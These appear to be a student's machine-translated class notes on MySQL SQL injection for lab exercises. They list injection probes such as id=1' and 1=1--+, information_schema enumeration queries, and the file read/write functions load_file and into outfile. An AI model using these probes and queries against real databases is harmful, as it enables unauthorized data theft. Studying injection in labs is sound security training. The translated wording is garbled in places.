First, the function
1. Version () MySQL Edition
2, User () database username
3. Database name
4, @ @datadir database path
5, @ @version_compile_os operating system version
6. Current_User () Current user name (viewable permissions)
7, Load_file () read the file
8, into outfile ()/into DumpFile write file
9, Group_concat (STR1,STR2 ...) Concatenate all the strings of a group and separate each piece of data with a comma.
Second, comments, can be used in the #--+ URL with%23
Third, UNION operator
The result set used to merge two or more SELECT statements. Note that the SELECT statement inside the UNION must have the same number of columns. The column must also have a similar data type. Also, the order of the columns in each SELECT statement must be the same.
SQL UNION Syntax:
SELECT column_name (s) from table_name1
UNION
SELECT column_name (s) from table_name2
Note: By default, the UNION operator chooses a different value. If duplicate values are allowed, use UNION all.
SQL UNION All syntax
SELECT column_name (s) from table_name1
UNION All
SELECT column_name (s) from table_name2
In addition, the column name in the union result set is always equal to the column name in the first SELECT statement in the Union.
Four, Mysql has a system database INFORMATION_SCHEMA,
Store all the information about the database, in general, we use the table can be a complete injection. The following is a general process.
Guess database
Select Schema_name from Information_schema.schemata
Guess the data table of a library
Select table_name from information_schema.tables where table_schema= ' xxxxx '
Guess all the columns of a table
Select column_name from Information_schema.columns where table_name= ' xxxxx '
Get the contents of a column
Select * * * * FROM * * *
The above knowledge reference use case: LESS1-LESS4
Five, Notes
1, single-line comments, #后面直接加内容, single-line comments,--must be added after the space;
2, multi-line annotation,/**/Middle can cross the line;
3, inline injection, the inline comment is the MySQL database in order to maintain compatibility with other databases, specifically added features.
To avoid SQL statements exported from MySQL that cannot be used by other databases, it puts some MySQL-specific statements in the/*! ... */IN,
These statements are not executed when used in incompatible databases. and MySQL itself can recognize and execute.
Vi. ORDER BY statement
1. The order BY statement is used to sort the result set based on the specified column.
2. The order BY statement sorts records by default in ascending order.
Seven, string join function
1, Concat (STR1,STR2.) Function Direct connection
2, Group_concat (STR1,STR2.) function uses commas as separators
3, Concat_ws (SEP,STR1,STR2.) function uses the first argument as a delimiter
Eight, Information_schema
Cases:
Select Schema_name from Information_schema.schemata;
Select table_name from information_schema.schemata where Table_schema = ' zzcms ';
Select column_name from information_schema.columns where table_schema = ' zzcms ' and ' table_name ' = ' zzcms_zx ';
IX. Classification of SQL injection
X. Injection mode based on federated query, step
Xi. to determine if there are injected and closed characters
1, id = 1 ' exception
id = 1 and 1 = 1--+ correct
id = 1 and 1=2--+ Error
Conclusion: There is a high likelihood of digital SQL injection
PS: Single quotes have a special effect: the command delimiter
2, id = 1 ' exception
id = 1 ' and 1 = 1--+ correct
id = 1 ' and 1=2--+ Error
Conclusion: It is very possible to have single-quote character SQL injection
3, id = 1 ' exception
id = 1 "and 1 = 1--+ correct
id = 1 "and 1=2--+ Error
Conclusion: It is very possible to have a double-quote character-type SQL injection
4, id = 1 ' exception
id = 1) and 1 = 1--+ correct
id = 1) and 1=2--+ Error
Conclusion: It is very possible to have parentheses digital SQL injection
SQL injection notes, first day, Zhangzhenfeng teacher